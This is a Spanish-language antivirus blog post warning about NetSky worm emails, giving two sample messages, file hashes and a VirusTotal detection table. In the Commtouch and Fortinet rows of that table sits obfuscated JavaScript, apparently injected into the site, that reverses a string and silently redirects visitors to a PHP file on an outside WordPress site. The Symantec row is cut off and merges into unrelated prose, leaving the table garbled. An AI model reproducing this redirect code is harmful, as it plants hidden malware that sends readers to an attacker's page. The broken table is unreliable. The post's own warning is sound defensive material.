NUEVO ENVIO DE EMAILS ADJUNTANDO ARCHIVOS INFECTADOS CON EL NETSKY
El archiconocido virus NETSKY, aun sigue propagandose masivamente, anexandose a los mails con diferentes técnicas en los ficheros, la de doble extension .TXT.EXE que para windows aparenta ser un TXT cuando realmente es un EXE, y otra, con extension .SCR (igualmente ejecutable) y en ambos casos con icono de documento de texto (WORDPAD)
Hemos recibido hoy dos mails (uno de cada) con dicho virus:
PRIMER MAIL MALICIOSO:
______________________
Asunto: Important m$6h?3p
De: <falso remitente> (spoofing)
Fecha: 07/03/2014 09:45
Para: <destinatario>
Please r564g!he4a56a3haafdogu#mfn3o
<SMTP Error #201>
+++ Attachment: No Virus found
+++ Bitdefender AntiVirus – www.bitdefender.com
ANEXADO : important.txt.exe (con icono de wordpad)
FIN DEL PRIMER MAIL MALICIOSO.
_____________________________
Y el otro mail , tambien con el NETSKY, es mas sofisticado, ofrece un enlace para acceder al fichero malware:
SEGUNDO MAIL MALICIOSO:
_____________________
If the message will not displayed automatically,
follow the link to read the delivered message.
Received message is available at:
www.<destinatario>/inbox/sat/read.php?sessionid-27801 ->(enlace malicioso)
y en este caso descarga este fichero:
message.scr (tambien con icono de wordpad)
______________________________
FIN DEL SEGUNDO MAIL MALICIOSO
en ambos casos los ficheros tienen el mismo MD5, y el preanalisis de virustotal ofrece el siguiente informe:
MD5 3018e99857f31a59e0777396ae634a8f
SHA1 7031cfe76ee7b2c925f2c00372fb9ef7f983f60c
Tamaño del fichero 28.9 KB ( 29568 bytes )
SHA256: c8fffb2e737514c551b2d7bcaf8baa459564b059cab1a35a3cec4b3c270d4525
Nombre: important.txt.exe.vir
Detecciones: 48 / 50
Fecha de análisis: 2014-03-07 09:49:01 UTC ( hace 0 minutos )
1 17
Antivirus Resultado Actualización
AVG I-Worm/Netsky 20140306
Ad-Aware Win32.Generic.497472 20140307
Agnitum I-Worm.NetSky!4NWvXC1SwiU 20140307
AhnLab-V3 Win-Trojan/Fsg.29568 20140307
AntiVir Worm/Netsky.AP 20140307
Antiy-AVL Worm[Email]/Win32.NetSky 20140307
Avast Win32:Netsky-AF [Wrm] 20140307
Baidu-International Worm.Win32.NetSky.AtcC 20140307
BitDefender Win32.Generic.497472 20140307
Bkav W32.SkyNetP.Worm 20140306
CAT-QuickHeal W32.NetSky.P 20140307
CMC Generic.Win32.3018e99857!MD 20140307
ClamAV Worm.NetSky-14 20140307
Commtouch $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:W32/Netsky.P@mm”>W32/Netsky.P@mm 20140307
F-Secure Win32.Generic.497472 20140307
Fortinet $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:W32/Netsky.p@MM”>W32/Netsky.p@MM 20140307
McAfee-GW-Edition Heuristic.BehavesLike.Win32.Suspicious-PKR.G 20140307
MicroWorld-eScan Win32.Generic.497472 20140307
Microsoft Worm:Win32/Netsky.P@mm 20140307
NANO-Antivirus Trojan.Win32.NetSky.idzx 20140307
Norman Netsky.P 20140307
Panda W32/Netsky.AE.worm 20140307
Qihoo-360 Win32/Worm.d2e 20140307
Rising PE:Trojan.Win32.Generic.129CEE65!312274533 20140306
SUPERAntiSpyware Worm.Netsky-P 20140307
Sophos W32/Netsky-P 20140307
Symantec todas las direcciones falseando el remitente y utilizando una de las direcciones de la lista como si fuera el remitente real, sin serlo, claro (SPOOFING), con lo que dicho falso remitente recibe las devoluciones o quejas de los usuarios a los que se les ha enviado el virus, mientras que el que realmente lo ha hecho por estar infectado, no se entera.
Actualmente lo controlan casi todos los antivirus, por lo que la infección/propagacion será efectuada por alguien que no tenga instalado uno de dichos antivirus o que no lo tenga residente.
En cualquier caso nuestro ELINETSA actual ya controla y elimina dicho virus, por lo que incluso en ordenadores sin antivirus lo detectaría y eliminaría.
Pero como en cada oleada de propagacion de dicho virus, habrá infectados y afectados, aun sin estar infectados, por la devolucion de mails y quejas de quien habrá recibido “su” mail.
saludos
ms, 7-3-2014
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Los comentarios están cerrados.